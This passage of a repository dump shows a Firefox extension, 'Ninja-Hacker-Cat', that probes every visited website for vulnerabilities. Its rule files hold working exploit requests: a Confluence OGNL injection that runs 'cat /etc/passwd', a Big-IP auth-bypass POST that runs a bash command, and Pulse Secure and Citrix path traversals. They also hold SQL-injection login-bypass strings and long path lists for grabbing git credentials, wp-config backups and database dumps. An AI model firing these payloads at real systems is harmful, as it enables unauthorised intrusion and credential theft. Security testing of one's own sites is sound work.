| let body = await response.text() 11 | body = body.toLocaleLowerCase() 12 | 13 | // detect wordpress 14 | if (body.includes("/wp-content/")) { 15 | allDetectedTags.push("wordpress") 16 | } 17 | 18 | // detect exchange owa page 19 | if (requestUrl.includes("/owa/")) { 20 | allDetectedTags.push("exchange") 21 | } 22 | 23 | // detect GET param in URL 24 | if (requestUrl.includes("?")) { 25 | 
allDetectedTags.push("get-param") 26 | } 27 | 28 | // detect POST param in url 29 | if (body.includes("= 0 64 | && body.includes("weblogic")) { 65 | allDetectedTags.push("weblogic") 66 | } 67 | 68 | // detect roundcube by title tag 69 | if (body.includes("Roundcube Webmail".toLowerCase())) { 70 | allDetectedTags.push("roundcube") 71 | } 72 | 73 | // detect joomla by meta generator info 74 | if (body.includes('<meta name="generator" content="Joomla'.toLowerCase())) { 75 | allDetectedTags.push("joomla") 76 | } 77 | 78 | // detect drupal by meta generator info 79 | if (body.includes('<meta name="generator" content="Drupal"'.toLowerCase())) { 80 | allDetectedTags.push("drupal") 81 | } 82 | 83 | console.log("detected tags: " + allDetectedTags) 84 | return allDetectedTags; 85 | } -------------------------------------------------------------------------------- /images/cat-default-grey.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/images/cat-default-grey.png -------------------------------------------------------------------------------- /images/cat-default.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/images/cat-default.png -------------------------------------------------------------------------------- /images/cat-laugh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/images/cat-laugh.png -------------------------------------------------------------------------------- /images/cat-love.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/images/cat-love.png -------------------------------------------------------------------------------- /images/cat-omg.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/images/cat-omg.png -------------------------------------------------------------------------------- /images/cat-panic.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Leetcore/ninja-hacker-cat/47a75544e822a6c1db9e91f5c24f98bcc8a2b3d3/images/cat-panic.png -------------------------------------------------------------------------------- /manifest.json: -------------------------------------------------------------------------------- 1 | { 2 | "manifest_version": 2, 3 | "name": "Ninja-Hacker-Cat", 4 | "description": "Cute Script Kitty makes web security checks for you!", 5 | "version": "1.7", 6 | "browser_action": { 7 | "default_icon": "/images/cat-default-grey.png", 8 | "default_title": "Miau!" 
9 | }, 10 | "background": { 11 | "scripts": ["/scripts/background.js"] 12 | }, 13 | "permissions": [ 14 | "notifications", 15 | "webRequest", 16 | "<all_urls>" 17 | ] 18 | } -------------------------------------------------------------------------------- /panel.css: -------------------------------------------------------------------------------- 1 | html, 2 | body { 3 | font-family: 'Nix 8810'; 4 | box-sizing: border-box; 5 | background-color: #222; 6 | color: #f49917; 7 | font-size: 16px; 8 | } 9 | 10 | a, 11 | a:hover, 12 | a:visited { 13 | color: #cd7b0a; 14 | } 15 | 16 | a#reset { 17 | text-decoration: none; 18 | } 19 | 20 | #main { 21 | position: relative; 22 | margin: 20px auto; 23 | max-width: 800px; 24 | } 25 | 26 | #sidebar { 27 | position: absolute; 28 | top: 0; 29 | left: 0; 30 | width: 200px; 31 | } 32 | 33 | #content { 34 | position: absolute; 35 | top: 0px; 36 | left: 250px; 37 | width: 50%; 38 | max-width: 500px; 39 | min-width: 250px; 40 | } 41 | 42 | #footer { 43 | position: fixed; 44 | bottom: 10px; 45 | right: 10px; 46 | } 47 | 48 | .avatar { 49 | max-width: 250px; 50 | } 51 | 52 | input { 53 | margin-left: -1px; 54 | } 55 | 56 | .checkbox-deactivated { 57 | color: #333; 58 | } 59 | 60 | .small { 61 | font-size: 70%; 62 | } 63 | 64 | .reset { 65 | border: none; 66 | padding: 10px; 67 | width: 100%; 68 | text-align: center; 69 | cursor: pointer; 70 | color: #333; 71 | } 72 | 73 | .stats { 74 | font-size: 80%; 75 | margin-left: 24px; 76 | } 77 | 78 | .message { 79 | background-color: #d6810e0a; 80 | padding: 10px; 81 | margin: 5px 0px; 82 | font-size: 18px; 83 | border-radius: 5px; 84 | box-shadow: 3px 3px #1a1a1a; 85 | border: 1px solid #000; 86 | word-wrap: anywhere; 87 | word-break: break-all; 88 | } 89 | 90 | .message a { 91 | font-size: 80%; 92 | display: -webkit-box; 93 | -webkit-line-clamp: 4; 94 | -webkit-box-orient: vertical; 95 | overflow: hidden; 96 | } 97 | 98 | .message .size, 99 | .message .detect { 100 | font-size: 75%; 101 | color: 
rgb(168, 111, 36); 102 | } 103 | 104 | .title { 105 | font-weight: bold; 106 | } 107 | 108 | .status { 109 | color: rgb(198, 186, 30); 110 | } 111 | 112 | .avatar { 113 | display: none; 114 | } 115 | 116 | .avatar-left { 117 | transform: scaleX(-1); 118 | margin-left: -50px; 119 | } 120 | 121 | .hidden { 122 | display: none; 123 | } 124 | 125 | @font-face { 126 | font-family: "Nix 8810"; 127 | src: url(Nix8810.woff); 128 | } 129 | 130 | @media screen and (max-width: 530px) { 131 | #sidebar { 132 | position: initial; 133 | width: 100%; 134 | } 135 | #content { 136 | position: initial; 137 | width: 100%; 138 | } 139 | #footer { 140 | position: initial; 141 | } 142 | .avatar { 143 | margin: 0 auto; 144 | } 145 | } -------------------------------------------------------------------------------- /panel.html: -------------------------------------------------------------------------------- 1 | <!DOCTYPE html> 2 | <html> 3 | 4 | <head> 5 | <meta charset="utf-8"> 6 | <link rel="icon" href="/images/cat-default.png"> 7 | <link rel="stylesheet" href="panel.css" /> 8 | <!-- Info: title is used to check if this tab is open --> 9 | <title>✔ Active Ninja Hacker Cat 10 | 11 | 12 | 13 |

59 | Dear human,
60 | thanks for checking your web applications for baaaaad 61 | security vulnerabilities. Ninja Hacker Cat is free and my source code 62 | can be found on GitHub. 63 |

64 |

65 | If you close this tab (or uncheck the box) i will stop snooping around 66 | and take a nap. 67 |

68 |

69 | You can buy me cat food with 70 | GitHub 71 | or Ko-Fi. 72 |

73 |

74 | xoxo, 😻 Script Kitty! 75 |

78 | 81 | 82 | 83 | 84 | -------------------------------------------------------------------------------- /readme.md: -------------------------------------------------------------------------------- 1 | # Ninja-Hacker-Cat Sidebar for Firefox 2 | This Firefox extension can check your website for the most basic 3 | security issues and data leaks. It's an easy way to test the basic security of 4 | your websites! 5 | 6 | ## Installation 7 | Install the extension in Firefox: 8 | 9 | Firefox Add-Ons 10 | 11 | 12 | Temporary installation: 13 | * Settings 14 | * Debug extension 15 | * New extension -> Open `manifest.json` 16 | 17 | ## How to test these features 18 | You can test some features against wackopicko or juice shop (both commands below bind host port 8080, so run one at a time). 19 | CVEs can be tested against vulhub e.g. confluence. 20 | 21 | ``` bash 22 | docker run --rm -p 8080:3000 bkimminich/juice-shop 23 | docker run --rm -p 8080:80 adamdoupe/wackopicko 24 | ``` 25 | 26 | Try: http://localhost:8080/ afterwards. 27 | 28 | # Rules 29 | `engine/detection.js`: Try to understand the current web service and trigger 30 | the rules that match these application "tags". 31 | 32 | `rules/leak-urls.js`: Contains filenames that may be interesting -> WP-Backups, 33 | GIT-Leaks. 34 | 35 | `rules/poc.js`: Contains proof of concepts for critical security issues -> 36 | Confluence RCE. 37 | 38 | `rules/versions.js`: Contains rules for version grabbing and detecting 39 | vulnerable versions -> Exchange RCE. 40 | 41 | `rules/web.js`: Contains rules for web vulnerabilities based on URL. -> SQLi, 42 | Keywords. 43 | 44 | `rules/fuzzing.js`: Contains rules for fuzzing GET and POST params based on 45 | current WebRequest. -> XSS, SQLi. 
46 | 47 | ## TODO 48 | * [ ] Add headers and postJSON for poc.js 49 | * [ ] Add response size check to rules 50 | * [ ] Change exchange proxyshell detection to passive mode 51 | * [ ] Add website detection for big-ip, citrix, cisco, pulse 52 | * [ ] Add fuzzing param filter 53 | * [X] Add request limit (timer) 54 | * [X] Add fuzzing for get params 55 | * [X] Refactoring fuzzing (only change one param per request)! 56 | * [X] Wrapper for fetch requests to count 57 | * [X] Test fuzzing form data 58 | * [X] Add securityinfo.txt 59 | * [X] Version detection 60 | * [X] Check for leaky urls in current tab 61 | 62 | ## Detections 63 | * [ ] Wordpress Version 64 | * [ ] PHP Version 65 | * [ ] SQL Injection based on Header/Cookies 66 | * [ ] IDOR based on GET-Param 67 | * [ ] Path traversal 68 | * [ ] OS Command Injection (https://portswigger.net/support/using-burp-to-test-for-os-command-injection-vulnerabilities) 69 | * [ ] Big-IP RCE (https://github.com/horizon3ai/CVE-2022-1388/blob/main/CVE-2022-1388.py) 70 | * [ ] ManageEngine ADSelfService (https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html) 71 | * [X] XSS Tests in GET-Param (tested) 72 | * [X] SQL Injection based on GET-Param (tested) 73 | * [X] SQL Injection Login bypass (JSON, tested) 74 | * [X] Bitbucket RCE (version only, tested) 75 | * [X] Confluence RCE (PoC, tested) 76 | * [X] Exchange Proxyshell (PoC, untested) 77 | * [X] Apache (version only, untested) 78 | * [X] Weblogic Console (PoC, tested) 79 | 80 | # CVEs 81 | The CVEs this browser extension can detect: 82 | Confluence Server (CVE-2022-26134), Bitbucket Server (CVE-2022-36804), 83 | Exchange Server Proxyshell (CVE-2021-34473), Apache (CVE-2021-41773), 84 | Weblogic Console (CVE-2020-14882). 85 | 86 | # Deployment 87 | ``` bash 88 | zip -r Ninja-Hacker-Cat.zip . 
-x ".*" -x "images/.*" 89 | ``` 90 | 91 | # Release notes 92 | Version: 1.7 93 | * Fix duplicated requests and messages 94 | 95 | Version: 1.6 96 | * Fix version detection rules 97 | * Configure attack rules with checkboxes 98 | * Faster requests (fewer requests with rule checkboxes) 99 | 100 | Version: 1.5 101 | * Improved detection of SQL injection 102 | * Improved global request timer 103 | 104 | Version: 1.4 105 | * Improve visuals of script kitty activity 106 | * Leaks added: SQL backup, git credentials, backup files, etc 107 | 108 | Version: 1.3 109 | * Subdomain detection added 110 | * Browser notification added 111 | * Fixed fuzzing engine for post params 112 | * Cat images changed to a lovely kitty 113 | * Untested PoCs added 114 | 115 | Version: 1.2 116 | * License changed to Mozilla Public License 2.0 because it's not allowed to use logo / visuals 117 | * Fixing the root urls if a port is specified -> Tested RCE: Weblogic Console (CVE-2020-14882) 118 | * Changing the interface from panel in background to icon and full background page 119 | 120 | # Copyright 121 | Source Code is under Mozilla Public License 2.0 122 | 123 | All rights reserved for the plugin name, artworks, logo and images 124 | (all cat images)! 125 | 126 | Copyright 1337core, 2022 127 | 128 | https://www.1337core.de -------------------------------------------------------------------------------- /rules/fuzzing.js: -------------------------------------------------------------------------------- 1 | export const fuzzing = [ 2 | // This rules are running in fuzzing-engine and will be executed against 3 | // the current captured webrequest! 
4 | { 5 | title: "Bypass: SQL Injection", 6 | postParams: [ 7 | "'-- ", 8 | "' or 'a'='a'-- " 9 | ], 10 | filterPostParams: [ 11 | "id", 12 | "guid", 13 | "username", 14 | "user", 15 | "login", 16 | "password", 17 | "pass" 18 | ], 19 | filterStatusCodes: ["302", "200", "500"], 20 | detectResponses: ["auth", "logout", "syntax error"], 21 | cat: "cat-panic", 22 | critLevel: 3 23 | }, 24 | { 25 | title: "Default Keywords", 26 | postParams: [ 27 | "admin", 28 | "test", 29 | "dev", 30 | "testing", 31 | "guest" 32 | ], 33 | filterPostParams: [ 34 | "username", 35 | "user", 36 | "login", 37 | "password", 38 | "pass" 39 | ], 40 | isRedirected: true, 41 | replaceParamValue: true, 42 | detectStatusCodes: ["200"], 43 | cat: "cat-laugh", 44 | critLevel: 1 45 | } 46 | ] 47 | 48 | -------------------------------------------------------------------------------- /rules/leak-urls.js: -------------------------------------------------------------------------------- 1 | export const leakUrls = [ 2 | { 3 | title: "Git Config", // the title of the alert message 4 | paths: [ // this stuff will be after the current url 5 | "/.git/", 6 | "/.git/config" 7 | ], 8 | detectResponses: ["remote"], // check this response in body 9 | filterStatusCodes: ["200"], // only check other detect values if response code matches 10 | detectStatusCodes: ["200"], // alert is based on response code 11 | tags: ["root"], // only run this rule if these tags where detected on the website 12 | cat: "cat-laugh", // change the avatar to this image 13 | critLevel: 1 // 1,2,3 critlevel is for showing the most critical kitten 14 | }, 15 | { 16 | title: "Helm Config", 17 | rootPaths: [ 18 | "/.helm/values.yaml" 19 | ], 20 | detectResponses: ["password"], 21 | filterStatusCodes: ["200"], 22 | tags: ["root"], 23 | cat: "cat-laugh", 24 | critLevel: 2 25 | }, 26 | { 27 | title: "Nginx Config", 28 | rootPaths: [ 29 | "/nginx/nginx.conf", 30 | "/nginx.conf" 31 | ], 32 | detectResponses: ["server"], 33 | filterStatusCodes: 
["200"], 34 | tags: ["nginx"], 35 | cat: "cat-laugh", 36 | critLevel: 1 37 | }, 38 | { 39 | title: "Nginx - Git Configuration Exposure", 40 | rootPaths: [ 41 | '/static../.git/config', 42 | '/js../.git/config', 43 | '/images../.git/config', 44 | '/img../.git/config', 45 | '/css../.git/config', 46 | '/assets../.git/config', 47 | '/content../.git/config', 48 | '/events../.git/config', 49 | '/media../.git/config', 50 | '/lib../.git/config' 51 | ], 52 | detectResponses: ["[core]"], 53 | filterStatusCodes: ["200"], 54 | tags: ["nginx"], 55 | cat: "cat-laugh", 56 | critLevel: 2 57 | }, 58 | { 59 | title: "Git Credentials Disclosure", 60 | rootPaths: [ 61 | '/.git-credentials' 62 | ], 63 | detectResponses: ["[credential"], 64 | filterStatusCodes: ["200"], 65 | tags: ["all"], 66 | cat: "cat-laugh", 67 | critLevel: 2 68 | }, 69 | { 70 | title: "WP-Config Backup", 71 | rootPaths: [ 72 | "/wp-config.php~", 73 | "/wp-config.php.bak", 74 | "/wp-config.php.backup", 75 | "/wp-config.bak", 76 | "/wp-config.php.bkp", 77 | "/wp-config.php.copy", 78 | "/wp-config.php.old", 79 | "/wp-config.php.orig", 80 | "/wp-config.php.save", 81 | "/wp-config.php.swp", 82 | "/wp-config.php.temp", 83 | "/wp-config.php.tmp" 84 | ], 85 | detectResponses: ["DB_PASSWORD"], 86 | filterStatusCodes: ["200"], 87 | tags: ["wordpress", "wp"], 88 | cat: "cat-panic", 89 | critLevel: 3 90 | }, 91 | { 92 | title: "WP-Content File Listing", 93 | rootPaths: [ 94 | "/wp-content/" 95 | ], 96 | detectResponses: [ 97 | "Index of" 98 | ], 99 | filterStatusCodes: ["200"], 100 | tags: ["wordpress", "wp"], 101 | cat: "cat-default", 102 | critLevel: 2 103 | }, 104 | { 105 | title: "SQL Backup", 106 | rootPaths: [ 107 | "/mysql.initial.sql", 108 | "/db.sql", 109 | "/dump.sql", 110 | "/backup.zip", 111 | "/backup.sql", 112 | "/backup.old", 113 | "/data.sql", 114 | "/data.old", 115 | "/temp.sql", 116 | "/users.sql" 117 | ], 118 | detectResponses: [ 119 | "INSERT INTO", 120 | "Roundcube Webmail initial database structure" 121 | 
], 122 | filterStatusCodes: ["200"], 123 | tags: ["all"], 124 | cat: "cat-panic", 125 | critLevel: 2 126 | }, 127 | { 128 | title: "Webserver Backupfiles", 129 | paths: [ 130 | "/main.php.bak", 131 | "/config.php.bak", 132 | "/db.php.bak", 133 | "/database.php.bak", 134 | ], 135 | detectResponses: [ 136 | "" 205 | ], 206 | filterStatusCodes: ["200"], 207 | tags: ["all"], 208 | cat: "cat-laugh", 209 | critLevel: 1 210 | }, 211 | { 212 | title: "Clockwork PHP page exposure", 213 | rootPaths: [ 214 | "/__clockwork/app" 215 | ], 216 | detectResponses: [ 217 | "Clockwork" 218 | ], 219 | filterStatusCodes: ["200"], 220 | tags: ["all"], 221 | cat: "cat-default", 222 | critLevel: 2 223 | }, 224 | { 225 | title: "Rails Debug Mode", 226 | rootPaths: [ 227 | "/jkfnjdknfkdnfgkdsng" 228 | ], 229 | detectResponses: [ 230 | "Action Controller: Exception caught" 231 | ], 232 | filterStatusCodes: ["200"], 233 | tags: ["root"], 234 | cat: "cat-default", 235 | critLevel: 1 236 | }, 237 | { 238 | title: "Roundcube Logs", 239 | rootPaths: [ 240 | "/roundcube/logs/sendmail", 241 | "/roundcube/logs/errors.log" 242 | ], 243 | detectResponses: [ 244 | "IMAP Error:" 245 | ], 246 | filterStatusCodes: ["200"], 247 | tags: ["roundcube"], 248 | cat: "cat-laugh", 249 | critLevel: 1 250 | }, 251 | { 252 | title: "BitBucket Pipelines Configuration", 253 | rootPaths: [ 254 | "/bitbucket-pipelines.yml" 255 | ], 256 | detectResponses: [ 257 | "pipelines:" 258 | ], 259 | filterStatusCodes: ["200"], 260 | tags: ["all"], 261 | cat: "cat-laugh", 262 | critLevel: 2 263 | }, 264 | { 265 | title: "Composer-auth JSON File Disclosure", 266 | rootPaths: [ 267 | "/.composer-auth.json", 268 | "/vendor/webmozart/assert/.composer-auth.json" 269 | ], 270 | detectResponses: [ 271 | "github-oauth" 272 | ], 273 | filterStatusCodes: ["200"], 274 | tags: ["all"], 275 | cat: "cat-default", 276 | critLevel: 2 277 | }, 278 | { 279 | title: "Drupal Install", 280 | rootPaths: [ 281 | "/install.php?profile=default" 282 | ], 
283 | detectResponses: [ 284 | "Choose language | Drupal" 285 | ], 286 | filterStatusCodes: ["200"], 287 | tags: ["drupal"], 288 | cat: "cat-laugh", 289 | critLevel: 2 290 | }, 291 | { 292 | title: "Drupal User Listing", 293 | rootPaths: [ 294 | "/jsonapi/user/user" 295 | ], 296 | detectResponses: [ 297 | "display_name" 298 | ], 299 | filterStatusCodes: ["200"], 300 | tags: ["drupal"], 301 | cat: "cat-laugh", 302 | critLevel: 2 303 | }, 304 | { 305 | title: "Public Swagger API", 306 | rootPaths: [ 307 | "/swagger-ui/swagger-ui.js", 308 | "/swagger/swagger-ui.js", 309 | "/swagger-ui.js", 310 | "/swagger/ui/swagger-ui.js", 311 | "/swagger/ui/index", 312 | "/swagger/index.html", 313 | "/swagger-ui.html", 314 | "/swagger/swagger-ui.html", 315 | "/api/swagger-ui.html", 316 | "/api-docs/swagger.json", 317 | "/api-docs/swagger.yaml", 318 | "/api_docs", 319 | "/swagger.json", 320 | "/swagger.yaml", 321 | "/swagger/v1/swagger.json", 322 | "/swagger/v1/swagger.yaml", 323 | "/api/index.html", 324 | "/api/docs/", 325 | "/api/swagger.json", 326 | "/api/swagger.yaml", 327 | "/api/swagger.yml", 328 | "/api/swagger/index.html", 329 | "/api/swagger/swagger-ui.html", 330 | "/api/api-docs/swagger.json", 331 | "/api/api-docs/swagger.yaml", 332 | "/api/swagger-ui/swagger.json", 333 | "/api/swagger-ui/swagger.yaml", 334 | "/api/apidocs/swagger.json", 335 | "/api/apidocs/swagger.yaml", 336 | "/api/swagger-ui/api-docs", 337 | "/api/api-docs", 338 | "/api/apidocs", 339 | "/api/swagger", 340 | "/api/swagger/static/index.html", 341 | "/api/swagger-resources", 342 | "/api/swagger-resources/restservices/v2/api-docs", 343 | "/api/__swagger__/", 344 | "/api/_swagger_/", 345 | "/api/spec/swagger.json", 346 | "/api/spec/swagger.yaml", 347 | "/api/swagger/ui/index", 348 | "/__swagger__/", 349 | "/_swagger_/", 350 | "/api/v1/swagger-ui/swagger.json", 351 | "/api/v1/swagger-ui/swagger.yaml", 352 | "/swagger-resources/restservices/v2/api-docs", 353 | "/api/swagger_doc.json" 354 | ], 355 | 
detectResponses: [ 356 | "swagger:", 357 | "Swagger UI" 358 | ], 359 | filterStatusCodes: ["200"], 360 | tags: ["all"], 361 | cat: "cat-laugh", 362 | critLevel: 1 363 | }, 364 | { 365 | title: "Filezilla Config", 366 | rootPaths: [ 367 | "/filezilla.xml", 368 | "/sitemanager.xml", 369 | "/FileZilla.xml" 370 | ], 371 | detectResponses: [ 372 | "coremail' 500 | ], 501 | filterStatusCodes: ["200"], 502 | tags: ["all"], 503 | cat: "cat-panic", 504 | critLevel: 3 505 | }, 506 | { 507 | title: "Dockerfile Hidden Disclosure", 508 | rootPaths: [ 509 | "/.dockerfile", 510 | "/.Dockerfile" 511 | ], 512 | detectResponses: [ 513 | 'FROM' 514 | ], 515 | filterStatusCodes: ["200"], 516 | tags: ["all"], 517 | cat: "cat-laugh", 518 | critLevel: 2 519 | }, 520 | { 521 | title: "docker-compose.yml exposure", 522 | rootPaths: [ 523 | "/docker-compose.yml", 524 | "/docker-compose.prod.yml", 525 | "/docker-compose.production.yml", 526 | "/docker-compose.staging.yml", 527 | "/docker-compose.dev.yml", 528 | "/docker-compose-dev.yml", 529 | "/docker-compose.override.yml" 530 | ], 531 | detectResponses: [ 532 | 'services:' 533 | ], 534 | filterStatusCodes: ["200"], 535 | tags: ["all"], 536 | cat: "cat-laugh", 537 | critLevel: 2 538 | }, 539 | { 540 | title: "FTP credentials exposure", 541 | rootPaths: [ 542 | "/ftpsync.settings" 543 | ], 544 | detectResponses: [ 545 | 'overwrite_newer_prevention' 546 | ], 547 | filterStatusCodes: ["200"], 548 | tags: ["all"], 549 | cat: "cat-laugh", 550 | critLevel: 2 551 | }, 552 | { 553 | title: "FTP credentials exposure", 554 | rootPaths: [ 555 | "/ftpsync.settings" 556 | ], 557 | detectResponses: [ 558 | 'overwrite_newer_prevention' 559 | ], 560 | filterStatusCodes: ["200"], 561 | tags: ["all"], 562 | cat: "cat-laugh", 563 | critLevel: 2 564 | }, 565 | { 566 | title: "Info: Subdomain", 567 | subdomains: [ 568 | "mail", 569 | "imap", 570 | "smtp", 571 | "weblogic", 572 | "api", 573 | "exchange", 574 | "owa", 575 | "backend", 576 | "backup", 577 | 
"build", 578 | "bitbucket", 579 | "citrix", 580 | "chat", 581 | "talk", 582 | "community", 583 | "console", 584 | "terminal", 585 | "confluence", 586 | "conf", 587 | "data", 588 | "database", 589 | "sql", 590 | "mysql", 591 | "demo", 592 | "dev", 593 | "development", 594 | "downloads", 595 | "download", 596 | "drupal", 597 | "files", 598 | "file", 599 | "firewall", 600 | "ftp", 601 | "home", 602 | "jobs", 603 | "mobile", 604 | "auth", 605 | "wordpress", 606 | "blog", 607 | "weblog", 608 | "webmail", 609 | "server", 610 | "admin", 611 | "git", 612 | "login", 613 | "logs", 614 | "registry", 615 | "internal", 616 | "intern", 617 | "config", 618 | "vpn", 619 | "vnc", 620 | "scanme" 621 | ], 622 | skipRedirected: true, 623 | detectStatusCodes: ["200"], 624 | tags: ["all"], 625 | cat: "cat-default", 626 | critLevel: 0 627 | }, 628 | { 629 | title: "Info: Dev Port", 630 | ports: [ 631 | "8080", 632 | "8081", 633 | "4434", 634 | "5000", 635 | "3000", 636 | "3001", 637 | "4000", 638 | "4443", 639 | "5000", 640 | "5001", 641 | "8443" 642 | ], 643 | detectStatusCodes: ["200"], 644 | tags: ["all"], 645 | cat: "cat-default", 646 | critLevel: 0 647 | } 648 | ] -------------------------------------------------------------------------------- /rules/poc.js: -------------------------------------------------------------------------------- 1 | export const poc = [{ 2 | // UNTESTED!!! remove and test version 3 | title: "RCE: Exchange Server Proxyshell (CVE-2021-34473)", 4 | rootPaths: [ 5 | "/autodiscover/autodiscover.json?@foo.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@foo.com" 6 | ], 7 | detectResponses: ["Connectivity Endpoint"], 8 | tags: ["exchange"], 9 | cat: "cat-panic", 10 | critLevel: 3 11 | }, 12 | { 13 | // UNTESTED!!! 
14 | title: "LFI: Pulse Secure Pulse (CVE-2019-11510)", 15 | rootPaths: [ 16 | "/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/" 17 | ], 18 | detectResponses: ["root"], 19 | detectStatusCodes: ["200"], 20 | tags: ["pulse"], 21 | cat: "cat-panic", 22 | critLevel: 2 23 | }, 24 | { 25 | title: "RCE: Confluence Server (CVE-2022-26134)", 26 | rootPaths: [ 27 | //'%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22cat /etc/passwd%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/' 28 | "/%24%7B%28%23a%3D%40org%2Eapache%2Ecommons%2Eio%2EIOUtils%40toString%28%40java%2Elang%2ERuntime%40getRuntime%28%29%2Eexec%28%22cat /etc/passwd%22%29%2EgetInputStream%28%29%2C%22utf%2D8%22%29%29%2E%28%40com%2Eopensymphony%2Ewebwork%2EServletActionContext%40getResponse%28%29%2EsetHeader%28%22X%2DCmd%2DResponse%22%2C%23a%29%29%2E%28%40com%2Eopensymphony%2Ewebwork%2EServletActionContext%40getResponse%28%29%2EsendError%28500%29%29%7D/" 29 | ], 30 | detectHeaders: ["x-cmd-response"], 31 | tags: ["confluence"], 32 | cat: "cat-panic", 33 | critLevel: 3 34 | }, { 35 | // UNTESTED!!! 36 | title: "Apache APISIX (CVE-2022-24112 )", 37 | rootPaths: [ 38 | "/apisix/admin/routes?api_key=edd1c9f034335f136f87ad84b625c8f1" 39 | ], 40 | detectStatusCodes: ["200"], 41 | tags: ["apache"], 42 | cat: "cat-panic", 43 | critLevel: 3 44 | }, { 45 | // UNTESTED!!! 46 | title: "RCE: Cisco Hyperflex (CVE-2021-1497)", 47 | rootPaths: [ 48 | "/css/..%2findex.htm" 49 | ], 50 | detectStatusCodes: ["200"], 51 | tags: ["cisco"], 52 | cat: "cat-panic", 53 | critLevel: 3 54 | }, { 55 | // UNTESTED!!! 
56 | title: "RCE: Citrix (CVE-2019-19781)", 57 | rootPaths: [ 58 | "/vpn/../vpns/cfg/smb.conf", 59 | ], 60 | detectStatusCodes: ["200"], 61 | tags: ["citrix"], 62 | cat: "cat-panic", 63 | critLevel: 3 64 | }, 65 | { 66 | title: "RCE: Weblogic Console (CVE-2020-14882)", 67 | rootPaths: [ 68 | "/console/css/%252e%252e%252fconsole.portal" 69 | ], 70 | detectStatusCodes: ["200"], 71 | tags: ["weblogic"], 72 | cat: "cat-panic", 73 | critLevel: 3 74 | }, { 75 | // UNTESTED 76 | title: "RCE: Big-IP (CVE-2022-1388)", 77 | method: "POST", 78 | rootPaths: [ 79 | "/mgmt/tm/util/bash" 80 | ], 81 | headers: { 82 | 'Host': '127.0.0.1', 83 | 'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=', 84 | 'X-F5-Auth-Token': 'asdf', 85 | 'Connection': 'X-F5-Auth-Token', 86 | 'Content-Type': 'application/json' 87 | }, 88 | postJSON: { "command": "run", "utilCmdArgs": "-c 'cat /etc/passwd}'" }, 89 | detectResponses: ["root"], 90 | tags: ["big-ip"], 91 | cat: "cat-panic", 92 | critLevel: 3 93 | }] -------------------------------------------------------------------------------- /rules/versions.js: -------------------------------------------------------------------------------- 1 | export const versions = [ 2 | { 3 | title: "Info: Security Text", 4 | rootPaths: [ 5 | "/.well-known/security.txt" 6 | ], 7 | detectStatusCodes: ["200"], 8 | tags: ["all"], 9 | cat: "cat-default", 10 | critLevel: 0 11 | }, { 12 | title: "RCE: Bitbucket Server (CVE-2022-36804)", 13 | minVersion: "7.0.0", 14 | maxVersion: "8.3.0", 15 | regexVersion: "v\\s*([\\d\\.]+)\\s*<\\/span>", 16 | tags: ["bitbucket"], 17 | detectedBy: "regex version", 18 | cat: "cat-panic", 19 | critLevel: 3 20 | }, { 21 | title: "RCE: Apache (CVE-2021-41773)", 22 | minVersion: "2.4.49", 23 | maxVersion: "2.4.50", 24 | regexVersion: "Apache\\/([\\d\\.]+)", 25 | matchRegexHeaderName: "Server", 26 | tags: ["apache"], 27 | detectedBy: "header", 28 | cat: "cat-panic", 29 | critLevel: 3 30 | }, { 31 | title: "RCE: Apache (CVE-2021-40438)", 32 | 
minVersion: "2.4.17", 33 | maxVersion: "2.4.48", 34 | regexVersion: "Apache\\/([\\d\\.]+)", 35 | matchRegexHeaderName: "Server", 36 | tags: ["apache"], 37 | detectedBy: "header", 38 | cat: "cat-panic", 39 | critLevel: 3 40 | }, { 41 | title: "RCE (authenticated): Exchange 2019 (CVE-2022-41040 and CVE-2022-41082)", 42 | minVersion: "15.2.1118", 43 | maxVersion: "15.2.1118", 44 | regexVersion: "auth\\/([\\d\\.]+)\/themes", 45 | tags: ["exchange", "owa"], 46 | detectedBy: "css-font-path", 47 | cat: "cat-panic", 48 | critLevel: 2 49 | }, { 50 | title: "RCE (authenticated): Exchange 2016 (CVE-2022-41040 and CVE-2022-41082)", 51 | minVersion: "15.1.2507", 52 | maxVersion: "15.1.2507", 53 | regexVersion: "auth\\/([\\d\\.]+)\/themes", 54 | tags: ["exchange", "owa"], 55 | detectedBy: "css-font-path", 56 | cat: "cat-panic", 57 | critLevel: 2 58 | }, { 59 | title: "RCE (authenticated): Exchange 2013 (CVE-2022-41040 and CVE-2022-41082)", 60 | minVersion: "15.0.1497", 61 | maxVersion: "15.0.1497", 62 | regexVersion: "auth\\/([\\d\\.]+)\/themes", 63 | tags: ["exchange", "owa"], 64 | detectedBy: "css-font-path", 65 | cat: "cat-panic", 66 | critLevel: 2 67 | }, { 68 | title: "Exchange 2010 (oudated)", 69 | minVersion: "14.3.513", 70 | maxVersion: "14.3.513", 71 | regexVersion: "auth\\/([\\d\\.]+)\/themes", 72 | tags: ["exchange", "owa"], 73 | detectedBy: "css-font-path", 74 | cat: "cat-panic", 75 | critLevel: 2 76 | }, { 77 | title: "RCE: Exchange 2019 Proxyshell (CVE-2021-34473)", 78 | minVersion: "15.2.221", 79 | maxVersion: "15.2.858", 80 | regexVersion: "auth\\/([\\d\\.]+)\/themes", 81 | tags: ["exchange", "owa"], 82 | detectedBy: 